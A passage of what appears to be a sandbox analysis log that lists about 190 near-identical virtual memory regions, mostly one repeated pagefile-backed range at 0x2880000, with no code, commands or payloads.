id = 5743 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5744 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5745 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5746 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5747 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5748 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5749 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5750 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5751 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5752 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5753 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5754 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5755 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5756 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5757 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5758 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5759 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5760 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5761 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5762 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5763 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5764 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5765 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5766 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5767 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5768 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5769 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5770 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5771 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5772 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5773 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5774 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5775 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5776 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5777 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5778 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5779 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5780 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5781 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5782 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5783 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5784 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5785 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5786 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5787 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5788 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5789 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5790 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5791 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5792 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5793 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5794 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5795 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5796 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5797 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5798 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5799 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5800 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5801 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5802 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5803 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5804 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5805 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5806 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5807 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5808 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5809 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5810 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5811 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5812 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5813 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5814 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5815 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5816 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5817 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5818 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5819 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5820 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5821 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5822 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5823 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 5824 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 5825 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5826 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5827 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5828 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5829 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5830 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5831 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5832 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5833 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5834 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5835 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5836 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5837 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5838 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5839 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5840 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5841 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5842 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5843 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5844 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5845 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5846 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5847 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5848 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5849 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5850 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5851 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5852 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5853 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5854 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5855 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5856 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5857 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5858 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5859 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5860 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5861 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5862 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5863 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5864 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5865 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5866 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5867 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5868 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5869 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5870 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5871 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5872 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5873 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5874 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5875 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5876 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5877 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5878 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5879 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5880 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5881 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5882 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5883 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5884 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5885 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5886 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5887 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5888 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5889 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5890 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5891 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5892 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5893 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5894 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5895 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5896 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5897 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5898 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5899 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5900 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5901 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5902 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5903 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5904 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5905 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5906 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5907 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5908 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5909 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5910 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5911 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5912 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5913 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5914 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5915 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5916 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5917 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5918 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5919 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5920 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5921 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5922 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5923 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5924 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5925 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5926 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5927 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5928 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5929 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 5930 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = 